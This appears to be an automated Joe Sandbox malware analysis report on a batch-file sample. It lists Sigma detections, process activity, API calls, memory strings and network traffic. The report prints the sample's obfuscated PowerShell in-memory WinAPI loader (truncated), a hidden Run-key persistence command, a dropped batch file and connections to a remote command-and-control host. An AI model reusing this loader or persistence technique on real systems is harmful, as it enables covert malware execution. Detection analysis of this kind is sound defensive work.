Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+'

Sigma detected: Potential WinAPI Calls Via CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+'

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8084, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F, ProcessId: 1352, ProcessName: schtasks.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7348, TargetFilename: C:\Windows\$cnt-onimai2\$cnt-CO2.bat

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows_Log

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7348, TargetFilename: C:\Windows\$cnt-onimai2\$cnt-CO2.bat

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows_Log

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 3268, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2936, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 7348, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 33_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

33_2_00401000

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197DD894 FindFirstFileExW,	21_2_000001F1197DD894
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F1197DDA18
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D5D894 FindFirstFileExW,	21_2_000001F119D5D894
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	21_2_000001F119D5DA18
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE49D894 FindFirstFileExW,	22_2_00000166BE49D894
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE49DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	22_2_00000166BE49DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A927D894 FindFirstFileExW,	37_2_00000279A927D894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A927DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_00000279A927DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92AD894 FindFirstFileExW,	37_2_00000279A92AD894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_00000279A92ADA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1ED894 FindFirstFileExW,	38_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D21D894 FindFirstFileExW,	38_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD5D894 FindFirstFileExW,	39_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD8D894 FindFirstFileExW,	39_2_0000017D2DD8D894

Source: global traffic

TCP traffic: 192.168.2.7:49704 -> 147.185.221.21:43063

Source: Joe Sandbox View

IP Address: 147.185.221.21 147.185.221.21

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fixed-noon.gl.at.ply.gg

Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000027.00000002.2560755573.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1748299304.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000027.00000000.1753671087.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2564745063.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000027.00000000.1748299304.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2560755573.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1782893457.0000022553606000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000027.00000002.2560755573.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1748299304.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
